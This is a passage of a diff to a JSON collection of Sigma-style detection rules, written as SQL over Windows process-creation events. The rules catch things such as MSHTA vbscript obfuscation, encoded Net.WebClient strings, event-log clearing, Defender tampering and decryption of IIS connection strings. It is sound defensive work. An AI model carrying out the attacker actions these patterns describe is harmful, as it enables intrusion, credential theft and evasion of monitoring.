'\\')" ], - "filename": "proc_creation_win_reg_software_discovery.yml" + "filename": "proc_creation_win_soundrecorder_audio_capture.yml" }, { - "title": "Arbitrary Binary Execution Using GUP Utility", - "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", - "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Imports Registry Key From a File", + "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "status": "test", + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.execution" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Other parent binaries using GUP not currently identified" + "Legitimate import of keys", + "Evernote" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\gup.exe' ESCAPE '\\' AND 
NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" ], - "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" + "filename": "proc_creation_win_regedit_import_keys.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "status": "experimental", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1059.001" + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 
'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", - "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", - "author": "frack113", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR 
CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE 
'%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE 
'%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE 
'%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Sysinternals PsService Execution", - "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "status": "experimental", - "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.t1543.003" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Legitimate use of PsService by an administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psservice.exe' OR (NewProcessName LIKE '%\\\\PsService.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psservice.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Defrag Deactivation", - "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005", - "attack.s0111" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_slingshot.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", + "title": "Potential Windows Defender Tampering Via Wmic.EXE", + "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", "status": 
"experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003" + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + "title": "Suspicious Execution of Hostname", + "id": "7be5fb68-f9ef-476d-8b51-0256ebece19e", "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "description": "Use of hostname to get information", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": 
"critical", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\HOSTNAME.EXE' ESCAPE '\\')" + ], + "filename": "proc_creation_win_hostname_execution.yml" + }, + { + "title": "Recon Information for Export with Command Prompt", + "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "status": "experimental", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", + "tags": [ + "attack.collection", + "attack.t1119" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tree.com' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\doskey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_susp_recon.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": 
"cc36992a-4671-4f21-a91d-6c2b72a2edf5", "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], 
- "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Potential Defense Evasion Via Binary Rename", - "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", - "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", + "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "status": "experimental", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.persistence", + "attack.defense_evasion" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist" + "Installation of unsigned packages for testing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary.yml" + "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "title": "Exploit for CVE-2017-0261", + "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 